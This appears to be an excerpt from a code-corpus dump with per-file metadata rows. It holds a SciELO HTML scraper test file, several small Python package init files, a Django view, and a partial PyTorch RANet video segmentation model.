u'[ <a href="javascript:void(0);" onclick="javascript: window.open(\'/scielo.php?script=sci_nlinks&ref=000194&pid=S0044-5967200900010001500012&lng=en\',\'\',\'width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,\');">Links</a> ]',
u'[ <a href="javascript:void(0);" onclick="javascript: window.open(\'/scielo.php?script=sci_nlinks&ref=000196&pid=S0044-5967200900010001500013&lng=en\',\'\',\'width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,\');">Links</a> ]',
u'[ <a href="javascript:void(0);" onclick="javascript: window.open(\'/scielo.php?script=sci_nlinks&ref=000198&pid=S0044-5967200900010001500014&lng=en\',\'\',\'width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,\');">Links</a> ]',
u'[ <a href="javascript:void(0);" onclick="javascript: window.open(\'/scielo.php?script=sci_nlinks&ref=000200&pid=S0044-5967200900010001500015&lng=en\',\'\',\'width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,\');">Links</a> ]',
u'[ <a href="javascript:void(0);" onclick="javascript: window.open(\'/scielo.php?script=sci_nlinks&ref=000202&pid=S0044-5967200900010001500016&lng=en\',\'\',\'width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,\');">Links</a> ]'
]
self.assertEqual(result, expected)
def test_regex_remove_links_ignore_case(self):
import re
data = """<p>ref 1: [ <a href="javascript:void(0);" onclick="javascript: window.open('/scielo.php?script=sci_nlinks&ref=000129&pid=S0001-3765200400030001400030&lng=pt','','width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,');">Links</a> ]</p><p>ref 2: [ <a href="javascript:void(0);" onclick="javascript: window.open('/scielo.php?script=sci_nlinks&ref=000129&pid=S0001-3765200400030001400030&lng=pt','','width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,');">links</a> ]</p>"""
result = load_body.REMOVE_LINKS_REGEX.sub(' ', data, count=0)
self.assertEqual(result, '<p>ref 1: </p><p>ref 2: </p>')
def test_scrapt_body_line_breaked(self):
data = u"""
<html>
<header></header>
<body>
<div class="content">
<div class="index,en">
<div class="title">Crazy <i>Title</i></div>
<p>Crazy Body</p>
<p>Really Crazy Body</p>
</div>
</div>
</body>
</html>
"""
result = load_body.scrap_body(data, 'en')
self.assertEqual(result, '<div class="title">Crazy <i>Title</i></div> <p>Crazy Body</p> <p>Really Crazy Body</p>')
def test_scrapt_body_not_found_for_a_given_language(self):
data = u"""<html><header></header><body><div class="content"><div class="index,en"><div class="title">Crazy <i>Title</i></div><p>Crazy Body</p><p>Really Crazy Body</p></div></div></body></html>"""
result = load_body.scrap_body(data, 'pt')
self.assertEqual(result, None)
def test_scrapt_body_not_found(self):
data = u"""<html><header></header><body><div class="content"></div></body></html>"""
result = load_body.scrap_body(data, 'pt')
self.assertEqual(result, None)
def test_body_sample_1(self):
data = ' '.join([i.strip() for i in codecs.open(os.path.dirname(__file__)+'/fixtures/body_sample_1.html', 'r', encoding='utf-8').readlines()])
result = load_body.scrap_body(data, 'pt')
# Text on the begining of the document
self.assertTrue(u'On the one pot syntheses' in result)
# Text on the end of the document
self.assertTrue(u'Web Release Date: November 26, 2009' in result)
def test_body_sample_2(self):
data = ' '.join([i.strip() for i in codecs.open(os.path.dirname(__file__)+'/fixtures/body_sample_2.html', 'r', encoding='utf-8').readlines()])
result = load_body.scrap_body(data, 'pt')
# Text on the begining of the document
self.assertTrue(u'meio para isolamento de' in result)
# Text on the end of the document
self.assertTrue(u'Recebido para publicação em 31-7-1967' in result)
def test_body_sample_3(self):
data = ' '.join([i.strip() for i in codecs.open(os.path.dirname(__file__)+'/fixtures/body_sample_3.html', 'r', encoding='utf-8').readlines()])
result = load_body.scrap_body(data, 'pt')
# Text on the begining of the document
self.assertTrue(u'A TRIBUTAÇÃO NA PRODUÇÃO DE CARVÃO VEGETAL' in result)
# Text on the end of the document
self.assertTrue(u'Recebido: 03 de Fevereiro de 2012; Aceito: 14 de Abril de 2014' in result)
def test_body_sample_4(self):
data = ' '.join([i.strip() for i in codecs.open(os.path.dirname(__file__)+'/fixtures/body_sample_4.html', 'r', encoding='utf-8').readlines()])
result = load_body.scrap_body(data, 'pt')
# Text on the begining of the document
self.assertTrue(u'Aquarelas de um Brasil' in result)
# Text on the end of the document
self.assertTrue(u'São Paulo, Companhia das Letras.' in result)
def test_body_sample_5(self):
data = ' '.join([i.strip() for i in codecs.open(os.path.dirname(__file__)+'/fixtures/body_sample_5.html', 'r', encoding='utf-8').readlines()])
result = load_body.scrap_body(data, 'pt')
# Text on the begining of the document
self.assertTrue(u'Molestia de Carlos Chagas' in result)
# Text on the end of the document
self.assertTrue(u'Full text available only in PDF format' in result)
def test_body_sample_6(self):
data = ' '.join([i.strip() for i in codecs.open(os.path.dirname(__file__)+'/fixtures/body_sample_6.html', 'r', encoding='utf-8').readlines()])
result = load_body.scrap_body(data, 'pt')
# Text on the begining of the document
self.assertTrue(u'Editorial' in result)
# Text on the end of the document
self.assertTrue(u'Boa leitura!' in result)
def test_body_sample_7(self):
data = ' '.join([i.strip() for i in codecs.open(os.path.dirname(__file__)+'/fixtures/body_sample_7.html', 'r', encoding='utf-8').readlines()])
result = load_body.scrap_body(data, 'en')
# Text on the begining of the document
self.assertTrue(u'caso da bacia do Amazonas' in result)
# Text on the end of the document
self.assertTrue(u'com o Embasamento. Universidade Federal' in result)
| 64.906433 | 532 | 0.656906 | 1,591 | 11,099 | 4.487744 | 0.126964 | 0.014006 | 0.042017 | 0.053221 | 0.822689 | 0.818207 | 0.789916 | 0.789636 | 0.789636 | 0.789636 | 0 | 0.091567 | 0.152807 | 11,099 | 170 | 533 | 65.288235 | 0.667766 | 0.044689 | 0 | 0.254902 | 0 | 0.058824 | 0.393785 | 0.171342 | 0 | 0 | 0 | 0 | 0.205882 | 1 | 0.137255 | false | 0 | 0.068627 | 0 | 0.215686 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
f8e6fab667d0361f53e9a779db2f1db685a1d2ba | 91 | py | Python | src/barril/basic/fraction/__init__.py | arthursoprana/barril | 87ebd247c3c3fa422f4ab3b5acdefbe9e85145c7 | [
"MIT"
] | 27 | 2018-09-21T18:11:47.000Z | 2021-10-05T23:32:30.000Z | src/barril/basic/fraction/__init__.py | arthursoprana/barril | 87ebd247c3c3fa422f4ab3b5acdefbe9e85145c7 | [
"MIT"
] | 43 | 2018-09-04T18:43:38.000Z | 2021-06-18T20:41:08.000Z | src/barril/basic/fraction/__init__.py | arthursoprana/barril | 87ebd247c3c3fa422f4ab3b5acdefbe9e85145c7 | [
"MIT"
] | 9 | 2018-09-21T14:20:14.000Z | 2020-02-20T11:31:47.000Z | from ._fraction import Fraction # noqa
from ._fraction_value import FractionValue # noqa
| 30.333333 | 50 | 0.802198 | 11 | 91 | 6.363636 | 0.545455 | 0.342857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 91 | 2 | 51 | 45.5 | 0.909091 | 0.098901 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
537f22d2d6cbd699923dab0f041f5b6bb0bc166f | 34 | py | Python | tests/urls.py | ShayestehHS/jw_nx | 94d767f85e0a839a3f8f707cb2cb9de1e17447f0 | [
"MIT"
] | null | null | null | tests/urls.py | ShayestehHS/jw_nx | 94d767f85e0a839a3f8f707cb2cb9de1e17447f0 | [
"MIT"
] | null | null | null | tests/urls.py | ShayestehHS/jw_nx | 94d767f85e0a839a3f8f707cb2cb9de1e17447f0 | [
"MIT"
] | null | null | null | from jw_nx.urls import urlpatterns | 34 | 34 | 0.882353 | 6 | 34 | 4.833333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088235 | 34 | 1 | 34 | 34 | 0.935484 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
538dc0c5b1c3fe5c686957e1f773e6826089c6d4 | 182 | py | Python | WonderPy/core/__init__.py | avrabe/WonderPy | 60d81340bed1085c32803b32209fbbd4c291310a | [
"MIT"
] | 1 | 2019-05-25T16:55:32.000Z | 2019-05-25T16:55:32.000Z | WonderPy/core/__init__.py | avrabe/WonderPy | 60d81340bed1085c32803b32209fbbd4c291310a | [
"MIT"
] | null | null | null | WonderPy/core/__init__.py | avrabe/WonderPy | 60d81340bed1085c32803b32209fbbd4c291310a | [
"MIT"
] | null | null | null | from . import wwBTLEMgr # noqa
from . import wwMain # noqa
from .wwCommands import WWCommands # noqa
from .wwRobot import WWRobot # noqa
from .wwSensors import WWSensors # noqa
| 30.333333 | 42 | 0.752747 | 23 | 182 | 5.956522 | 0.347826 | 0.233577 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.192308 | 182 | 5 | 43 | 36.4 | 0.931973 | 0.131868 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
539edb8e07d13e7bcbf8fbd23a14d0ae341a3e7a | 195 | py | Python | hubconf.py | Ivan1248/cutmix-semisup-seg | 0840a733fbf02271bc31a50b1cd800da19cd6fbd | [
"MIT"
] | null | null | null | hubconf.py | Ivan1248/cutmix-semisup-seg | 0840a733fbf02271bc31a50b1cd800da19cd6fbd | [
"MIT"
] | null | null | null | hubconf.py | Ivan1248/cutmix-semisup-seg | 0840a733fbf02271bc31a50b1cd800da19cd6fbd | [
"MIT"
] | null | null | null | from architectures.deeplab2 import (
ResNetDeepLab, resnet101_deeplab_coco, resnet101_deeplab_imagenet)
from architectures.deeplab3plus import DeepLabV3Plus, resnet101_deeplabv3plus_imagenet
| 48.75 | 86 | 0.882051 | 19 | 195 | 8.736842 | 0.578947 | 0.204819 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.072626 | 0.082051 | 195 | 3 | 87 | 65 | 0.854749 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
53b073e10f21a647bf5021b6704ed91ed5b4c831 | 191 | py | Python | codeswiftr/posts/views.py | bogdan-veliscu/dev-portfolio-website | 43eb323c67f3fd691388e79039e32479c1bc0974 | [
"Apache-2.0"
] | null | null | null | codeswiftr/posts/views.py | bogdan-veliscu/dev-portfolio-website | 43eb323c67f3fd691388e79039e32479c1bc0974 | [
"Apache-2.0"
] | 4 | 2021-03-30T13:40:00.000Z | 2021-09-22T19:12:56.000Z | codeswiftr/posts/views.py | bogdan-veliscu/dev-portfolio-website | 43eb323c67f3fd691388e79039e32479c1bc0974 | [
"Apache-2.0"
] | null | null | null | from django.shortcuts import render
from django.views.generic import TemplateView
# Create your views here
def latest_posts(request):
return render(request, 'posts/latest_posts.html')
| 21.222222 | 53 | 0.795812 | 26 | 191 | 5.769231 | 0.653846 | 0.133333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.13089 | 191 | 8 | 54 | 23.875 | 0.903614 | 0.115183 | 0 | 0 | 0 | 0 | 0.137725 | 0.137725 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.5 | 0.25 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
99018e2b3fd11be2bd01fae801e1673345cc9ec9 | 51,720 | py | Python | codes/RANet_model_vj_backup.py | v1viswan/RANet_modifications | 3cecca77bdf6397c00ddf34452d65c0af497bd26 | [
"Apache-2.0"
] | null | null | null | codes/RANet_model_vj_backup.py | v1viswan/RANet_modifications | 3cecca77bdf6397c00ddf34452d65c0af497bd26 | [
"Apache-2.0"
] | null | null | null | codes/RANet_model_vj_backup.py | v1viswan/RANet_modifications | 3cecca77bdf6397c00ddf34452d65c0af497bd26 | [
"Apache-2.0"
] | null | null | null | # ************************************
# Author: Ziqin Wang
# Email: ziqin.wang.edu@gmail.com
# Github: https://github.com/Storife
# ************************************
import torch
import torch.nn as nn
import numpy as np
from numpy.random import normal
from numpy.linalg import svd
from math import sqrt
from torch.nn import functional as f
from torch.nn import functional as F
from torch.autograd import Variable
import random
from torch.nn import DataParallel as DP
from RANet_lib.RANet_Model_imagenet import *
import time
def make_layer2(input_feature, out_feature, up_scale=1, ksize=3, d=1, groups=1):
p = int((ksize - 1) / 2)
if up_scale == 1:
return nn.Sequential(
nn.InstanceNorm2d(input_feature),
nn.ReLU(),
nn.Conv2d(input_feature, out_feature, ksize, padding=p, dilation=d, groups=groups),
)
return nn.Sequential(
nn.InstanceNorm2d(input_feature),
nn.ReLU(),
nn.Conv2d(input_feature, out_feature, ksize, padding=p),
nn.UpsamplingBilinear2d(scale_factor=up_scale),
)
class ResBlock2(nn.Module):
def __init__(self, input_feature, planes, dilated=1, group=1):
super(ResBlock2, self).__init__()
self.conv1 = nn.Conv2d(input_feature, planes, kernel_size=1, bias=False, groups=group)
self.bn1 = nn.InstanceNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, padding=1 * dilated, bias=False, dilation=dilated, groups=group)
self.bn2 = nn.InstanceNorm2d(planes)
self.conv3 = nn.Conv2d(planes, input_feature, kernel_size=1, bias=False, groups=group)
self.bn3 = nn.InstanceNorm2d(input_feature)
self.relu = nn.ReLU(inplace=True)
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
out += residual
out = self.relu(out)
return out
class ResBlock_f(nn.Module):
def __init__(self, input_feature, planes, dilated=1, group=1):
super(ResBlock2, self).__init__()
self.dilated = dilated
self.conv1 = nn.Conv2d(input_feature, planes, kernel_size=1, bias=False, groups=group)
self.bn1 = nn.InstanceNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, padding=1, bias=False, groups=group)
self.bn2 = nn.InstanceNorm2d(planes)
self.conv3 = nn.Conv2d(planes, input_feature, kernel_size=1, bias=False, groups=group)
self.bn3 = nn.InstanceNorm2d(input_feature)
self.relu = nn.ReLU(inplace=True)
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = f.avg_pool2d(out, self.dilated)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
out += residual
out = self.relu(out)
return out
class MS_Block(nn.Module):
def __init__(self, input_feature, out_feature, d=[1, 2, 4], group=1):
super(MS_Block, self).__init__()
self.l1 = nn.Conv2d(input_feature, out_feature, 3, padding=d[0], dilation=d[0], bias=False, groups=group)
self.l2 = nn.Conv2d(input_feature, out_feature, 3, padding=d[1], dilation=d[1], bias=False, groups=group)
self.l3 = nn.Conv2d(input_feature, out_feature, 3, padding=d[2], dilation=d[2], bias=False, groups=group)
def forward(self, x):
out = self.l1(x) + self.l2(x) + self.l3(x)
return out
class RANet(ResNet101):
def __init__(self, with_relu=0, pretrained=True, type='single_object'):
super(RANet, self).__init__(with_relu=with_relu, pretrained=pretrained)
self.fp16 = False
self.net_type = type
self._init_net()
self.p_1 = make_layer2(256, 256)
self.res_1 = ResBlock2(256, 128, 1)
self.p_2 = make_layer2(256, 128)
self.p_1b = make_layer2(256, 256)
self.res_1b = ResBlock2(256, 128, 1)
self.p_2b = make_layer2(256, 128)
self.ls13 = make_layer2(512, 32, up_scale=1, ksize=1)
self.ls14 = make_layer2(1024, 16, up_scale=2, ksize=1)
self.ls15 = make_layer2(2048, 16, up_scale=4, ksize=1)
self.ls22 = make_layer2(256, 32, up_scale=1, ksize=1)
self.ls23 = make_layer2(512, 16, up_scale=2, ksize=1)
self.ls24 = make_layer2(1024, 16, up_scale=4, ksize=1)
self.ls31 = make_layer2(64, 32, up_scale=1, ksize=1)
self.ls32 = make_layer2(256, 16, up_scale=2, ksize=1)
self.ls33 = make_layer2(512, 16, up_scale=4, ksize=1)
self.R2 = nn.Sequential(make_layer2(128 + 64, 128),
make_layer2(128, 64),
MS_Block(64, 32, d=[1,3,6]),
ResBlock2(32, 16),
nn.UpsamplingBilinear2d(scale_factor=2))
self.R3 = nn.Sequential(make_layer2(32 + 64, 64),
make_layer2(64, 32),
MS_Block(32, 16, d=[1,3,6]),
nn.UpsamplingBilinear2d(scale_factor=2),
ResBlock2(16, 8),
nn.Conv2d(16, 1, 3, padding=1)
)
self.R1 = nn.Sequential(make_layer2(256 + 64 + 1, 256),
make_layer2(256, 256),
MS_Block(256, 128, d=[1,3,6]),
ResBlock2(128, 64),
nn.UpsamplingBilinear2d(scale_factor=2))
self.L4 = make_layer2(1024, 256, ksize=3)
self.L5 = make_layer2(2048, 512, ksize=3)
self.L3 = make_layer2(512, 128, ksize=3)
self.L_g = make_layer2(512 + 256 + 128, 512)
self.rank_A = nn.Sequential(nn.Conv1d(2, 8, 1),
nn.PReLU(),
nn.Conv1d(8, 1, 1),
nn.ReLU())
self.Ranking = nn.Sequential(make_layer2(405, 128), ResBlock2(128, 32, 2), make_layer2(128, 1))
# self.Ranking = nn.Sequential(nn.Conv2d(405, 16, 1),
# nn.InstanceNorm2d(16), nn.ReLU(),
# nn.Conv2d(16, 1, 1, bias=False), nn.ReLU())
def Dtype(self, data):
if self.fp16:
return torch._C._TensorBase.half(data)
else:
return torch._C._TensorBase.float(data)
def _init_net(self):
if self.net_type == 'single_object':
self.forward = self.RANet_Single_forward_eval
print('Single-object mode')
elif self.net_type == 'multi_object':
self.forward = self.RANet_Multiple_forward_eval
print('Multi-object mode')
def set_type(self, type):
if self.net_type != 'single_object' and type == 'single_object':
self.forward = self.RANet_Single_forward_eval
print('Change to single-object mode')
elif self.net_type != 'multi_object' and type == 'multi_object':
self.forward = self.RANet_Multiple_forward_eval
print('Change to multi-object mode')
else:
pass
def corr_fun(self, Kernel_tmp, Feature, KERs=None):
size = Kernel_tmp.size()
if len(Feature) == 1:
Kernel = Kernel_tmp.view(size[1], size[2] * size[3]).transpose(0, 1)
Kernel = Kernel.unsqueeze(2).unsqueeze(3)
if not (type(KERs) == type(None)):
Kernel = KERs[0]
corr = torch.nn.functional.conv2d(Feature, Kernel.contiguous())
Kernel = Kernel.unsqueeze(0)
else:
CORR = []
Kernel = []
for i in range(len(Feature)):
ker = Kernel_tmp[i:i + 1]
fea = Feature[i:i + 1]
ker = ker.view(size[1], size[2] * size[3]).transpose(0, 1)
ker = ker.unsqueeze(2).unsqueeze(3)
if not (type(KERs) == type(None)):
ker = torch.cat([ker, KERs[i]], 0)
co = f.conv2d(fea, ker.contiguous())
CORR.append(co)
ker = ker.unsqueeze(0)
Kernel.append(ker)
corr = torch.cat(CORR, 0)
Kernel = torch.cat(Kernel, 0)
return corr, Kernel
def to_kernel(self, feature):
size = feature.size()
return feature.view(size[1], size[2] * size[3]).transpose(0, 1).unsqueeze(2).unsqueeze(3).contiguous()
def correlate(self, Kernel, Feature):
corr = torch.nn.functional.conv2d(Feature, Kernel,stride=1)
return corr
def P2masks(self, P, num):
M = []
M.append(self.Dtype((P == 0) + (P > int(num))))
for idx in range(1, num + 1):
M.append(self.Dtype(P == idx))
return M
def bbox_uncrop(img, bbox, size, crop_size): # 4D input
img = F.interpolate(img, size=crop_size[2::], mode='bilinear',align_corners=True)
msk = F.pad(img, (bbox[1], 864 - bbox[3], bbox[0], 480 - bbox[2],))
return msk
def RANet_Single_forward_eval(self, x1, Ker, msk2, msk_p, mode=''): # vxd feature * msk *2 _feature_Rf
if mode in ['first', 'encoder']:
# Exact template features
x2 = Ker
base_features2 = self.res_forward(x2)
Kernel_3 = f.normalize(f.max_pool2d(self.L3(base_features2[2]), 2))
Kernel_4 = f.normalize(self.L4(base_features2[3]))
Kernel_5 = f.normalize(f.interpolate(self.L5(base_features2[4]), scale_factor=2, mode='bilinear',align_corners=True))
Kernel_tmp = f.normalize(self.L_g(torch.cat([Kernel_3, Kernel_4, Kernel_5], dim=1)))
if mode == 'encoder':
return [Kernel_tmp]
Kernel_tmp = f.adaptive_avg_pool2d(Kernel_tmp, [15, 27])
return [Kernel_tmp]
if msk2.max() > 1:
msk2 = self.Dtype(msk2.ge(1.6))
msk_p = self.Dtype(msk_p.ge(1.6))
# Current frame feature
base_features1 = self.res_forward(x1)
Feature_3 = f.normalize(f.max_pool2d(self.L3(base_features1[2]), 2))
Feature_4 = f.normalize(self.L4(base_features1[3]))
Feature_5 = f.normalize(f.interpolate(self.L5(base_features1[4]), scale_factor=2, mode='bilinear',align_corners=True))
Feature = f.normalize(self.L_g(torch.cat([Feature_3, Feature_4, Feature_5], dim=1)))
'''
Kernel_tmp = Ker
m = f.adaptive_avg_pool2d(msk2.detach(), Kernel_tmp.size()[-2::])
Kernel = Kernel_tmp * m.repeat(1, 512, 1, 1)
mb = (1 - m).ge(0.9).float()
Kernel_back = Kernel_tmp * mb.repeat(1, 512, 1, 1).float()
corr, Kerner = self.corr_fun(Kernel, Feature)
corr_b, Kerner_b = self.corr_fun(Kernel_back, Feature)
'''
# Correlation
Kernel = Ker
m = f.adaptive_avg_pool2d(msk2.detach(), Kernel.size()[-2::])
mb = self.Dtype((1 - m).ge(0.9))
h_size = 15
w_size = 27
c_size = h_size * w_size
Correlation, a = self.corr_fun(Kernel, Feature)
# Select FG / BG similarity maps
corr = Correlation * m.view(-1, c_size, 1, 1)
corr_b = Correlation * mb.view(-1, c_size, 1, 1)
# Ranking attention scores
T_corr = f.max_pool2d(corr, 2).permute(0, 2, 3, 1).view(-1, c_size, h_size, w_size)
T_corr_b = f.max_pool2d(corr_b, 2).permute(0, 2, 3, 1).view(-1, c_size, h_size, w_size)
R_map = (f.relu(self.Ranking(T_corr)) * self.Dtype(m != 0)).view(-1, 1, c_size) * 0.2
R_map_b = (f.relu(self.Ranking(T_corr_b)) * mb).view(-1, 1, c_size) * 0.2
# Rank & select
co_size = corr.size()[2::]
max_only, indices = f.max_pool2d(corr, co_size, return_indices=True)
max_only = max_only.view(-1, 1, c_size) + R_map
m_sorted, m_sorted_idx = max_only.sort(descending=True, dim=2)
corr = torch.cat([co.index_select(0, m_sort[0, 0:256]).unsqueeze(0) for co, m_sort in zip(corr, m_sorted_idx)])
# corr = corr[0].index_select(0, m_sorted_idx[0, 0, 0:256]).unsqueeze(0)
max_only_b, indices = f.max_pool2d(corr_b, co_size, return_indices=True)
max_only_b = max_only_b.view(-1, 1, c_size) + R_map_b
m_sorted, m_sorted_idx = max_only_b.sort(descending=True, dim=2)
corr_b = torch.cat([co.index_select(0, m_sort[0, 0:256]).unsqueeze(0) for co, m_sort in zip(corr_b, m_sorted_idx)])
# corr_b = corr_b[0].index_select(0, m_sorted_idx[0, 0, 0:256]).unsqueeze(0)
# Merge net
fcorr = self.p_2(self.res_1(self.p_1(f.interpolate(corr, scale_factor=2, mode='bilinear',align_corners=True))))
fcorr_b = self.p_2(self.res_1(self.p_1(f.interpolate(corr_b, scale_factor=2, mode='bilinear',align_corners=True))))
# Decoder
base1 = torch.cat([self.ls13(base_features1[2]),
self.ls14(base_features1[3]),
self.ls15(base_features1[4]),
fcorr,
fcorr_b,
f.adaptive_avg_pool2d(msk_p, fcorr.size()[-2::])], 1)
fea1 = self.R1(base1)
base2 = torch.cat([self.ls22(base_features1[1]),
self.ls23(base_features1[2]),
self.ls24(base_features1[3]),
fea1], 1)
fea2 = self.R2(base2)
base3 = torch.cat([self.ls31(base_features1[0]),
self.ls32(base_features1[1]),
self.ls33(base_features1[2]),
fea2], 1)
fea3 = self.R3(base3)
out_R = f.sigmoid(fea3)
features = []
out = [out_R]
return out, features
def RANet_Multiple_forward_eval(self, x1, Ker, msk2, msk_p, mode='',scale_factor = 0): # vxd feature * msk *2 _feature_Rf
if mode == 'first':
# Exact template features
x2 = Ker
base_features2 = self.res_forward(x2)
Kernel_3 = f.normalize(f.max_pool2d(self.L3(base_features2[2]), 2))
Kernel_4 = f.normalize(self.L4(base_features2[3]))
Kernel_5 = f.normalize(f.interpolate(self.L5(base_features2[4]), scale_factor=2, mode='bilinear',align_corners=True))
Kernel_tmp = f.normalize(self.L_g(torch.cat([Kernel_3, Kernel_4, Kernel_5], dim=1)))
# Kernel_tmp = f.avg_pool2d(Kernel_tmp, 2)
return [Kernel_tmp]
# Current frame feature
base_features1 = self.res_forward(x1)
Feature_3 = f.normalize(f.max_pool2d(self.L3(base_features1[2]), 2))
Feature_4 = f.normalize(self.L4(base_features1[3]))
Feature_5 = f.normalize(f.interpolate(self.L5(base_features1[4]), scale_factor=2, mode='bilinear',align_corners=True))
Feature = f.normalize(self.L_g(torch.cat([Feature_3, Feature_4, Feature_5], dim=1)))
Kernel_tmp = Ker
Out_Rs = []
basef1 = torch.cat([self.ls13(base_features1[2]),
self.ls14(base_features1[3]),
self.ls15(base_features1[4]), ], 1)
basef2 = torch.cat([self.ls22(base_features1[1]),
self.ls23(base_features1[2]),
self.ls24(base_features1[3]), ], 1)
basef3 = torch.cat([self.ls31(base_features1[0]),
self.ls32(base_features1[1]),
self.ls33(base_features1[2])], 1)
for idx in range(len(Feature)): # batch
ker = Kernel_tmp[idx: idx + 1]
feature = Feature[idx: idx + 1]
m2 = msk2[idx: idx + 1]
mp = msk_p[idx: idx + 1]
max_obj = m2.max().int().data.cpu().numpy()
if max_obj < 2:
m2[0, 0, 0, 0] = 2
max_obj = m2.max().int().data.cpu().numpy()
M2s = self.P2masks(f.relu(m2 - 1), max_obj - 1)
M2_all = m2.ge(1.5).float()
Mps = self.P2masks(f.relu(mp - 1), max_obj - 1)
Mp_all = mp.ge(1.5).float()
# Correlation
W0, H0 = ker.size()[-2::]
W,H = feature.size()[-2::]
# Corr_subs = []
ker_R = self.to_kernel(ker)
corr_R = self.correlate(ker_R, feature)
self_corr_R = self.correlate(ker_R, ker)
# Ranking attention scores
T_corr = f.max_pool2d(corr_R,2).view(-1, W0*H0, W*H//4).transpose(1, 2).view(-1, W*H//4, W0, H0)
R_map = f.relu(self.Ranking(T_corr)) * 0.2
# Rmaps = []
# for idy in range(max_obj): # make corrs (backgrounds(=1) and objs)
# m2_rep = f.adaptive_avg_pool2d(M2s[idy], ker.size()[-2::])
# corr_sub = m2_rep.view(m2_rep.size()[0], -1, 1, 1) * corr_R
# Corr_subs.append(corr_sub)
# Rmaps.append((R_map * m2_rep).view(-1, 1, W0*H0))
Outs = []
for idy in range(1, max_obj): # training:with_bg, testing: w/o BG
# corr = Corr_subs[idy]
# co_size = Corr_subs[idy].size()[2::]
m2_rep = f.adaptive_avg_pool2d(M2s[idy], ker.size()[-2::])
corr = m2_rep.view(m2_rep.size()[0], -1, 1, 1) * corr_R
Rmap_idy = (R_map * m2_rep).view(-1, 1, W0*H0)
co_size = corr.size()[2::]
max_only, indices = f.max_pool2d(corr, co_size, return_indices=True)
max_only = max_only.view(-1, 1, W0*H0) + Rmap_idy
############## Addition by VJ
#### For FG, adjust scores based on how close a pixel is to rest of the FG pixes and far away from BG pixels
# Self correlation is of size: batch_size x W*H x W x H
# We want the final score to be a score on each pixel and thus of dimension: batch_size x W*H x 1 x 1
# Notation meaning: FG_BG: For WxH map with FG pixels, the channels have non zerovalue where
# channel id corresponds to BG != 0
# FG_FG = []
# FG_BG = []
# BG_BG = []
# BG_FG = []
# for b_iter in range(m2_rep.shape[0]):
# FG_FG.append(self.correlate(m2_rep[b_iter].view(-1, 1, 1, 1),m2_rep[b_iter:b_iter+1]))
# FG_BG.append(self.correlate(1-m2_rep[b_iter].view(-1, 1, 1, 1),m2_rep[b_iter:b_iter+1]))
# BG_FG.append(self.correlate(m2_rep[b_iter].view(-1, 1, 1, 1), 1-m2_rep[b_iter:b_iter+1]))
